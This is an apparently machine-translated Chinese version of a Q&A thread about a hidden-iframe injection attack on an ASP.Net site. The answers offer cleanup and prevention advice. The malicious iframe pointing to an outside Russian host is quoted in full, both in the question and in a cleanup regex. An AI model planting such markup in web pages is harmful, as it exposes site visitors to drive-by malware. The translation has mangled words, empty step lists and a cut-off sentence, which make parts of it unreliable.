我的一个网站最近感染了某种types的攻击,涉及注入一个隐藏的iframe,它的来源是来自一个网站q5x.ru(不链接)。
谷歌的search并没有帮助我弄清楚这个攻击是如何发生的,所以我想知道你们中的任何一个人是否也遇到过这个问题?
iframe代码是这样的:
<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>
根据请求,我正在运行一个ASP.Net网站的数据库,至于表单,显然是用于回发的ASP.Net表单。
我们最近在我们客户的网站上遇到了同样的问题。
这个问题很可能是由主要针对FTP客户端的病毒感染和search主机名/用户名/密码组合引起的。 一旦find,就会打开FTP服务器的连接,并searchindex。*文件并添加iFrame。
在我们的特殊情况下,我们的客户是less数可以直接访问FTP服务器的客户之一。 我们立即改变了密码,恢复了文件的备份,并删除了我们的客户端的FTP访问。
你应该采取的步骤:
另外请注意,如果Google抓取工具在受到感染时访问您的网站,则会将您添加到恶意软件列表中 ,这将严重影响您网站的声誉。 如果发生这种情况,请采取以下步骤 :
这里有一些提示可以帮助你:
如何清理受感染的文件?
使用这些正则expression式search包含恶意代码的所有页面,并将其replace为空格:
<iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden; position:absolute\”></iframe> echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\” visibility:hidden; position:absolute\\\”></iframe>\”;
您可能必须编写一个脚本来自动化服务器中的所有文件。
资料来源: http : //www.diovo.com/2009/03/hidden-iframe-injection-attacks/
https://stackoverflow.com/questions/990437/iframe-script-attack-to-website
这发生在我之前。 您需要手动search违规注入脚本并将其删除。 我build议你改变你的密码,并改变你的数据库和数据库表的名字,以确保
虽然@Aron 写道 ,可能有一些客户端病毒已经捕获了您的密码(对于这种特定的攻击,这可能是正确的),但这类攻击通常会利用服务器软件中未修复的漏洞。 就像在Web服务器本身,在CMS中,或者在诸如phpMyAdmin之类的工具中一样。
所以:你确定你正在运行服务器上所有软件的最新版本?
(或者FTP日志确实显示一些活动?)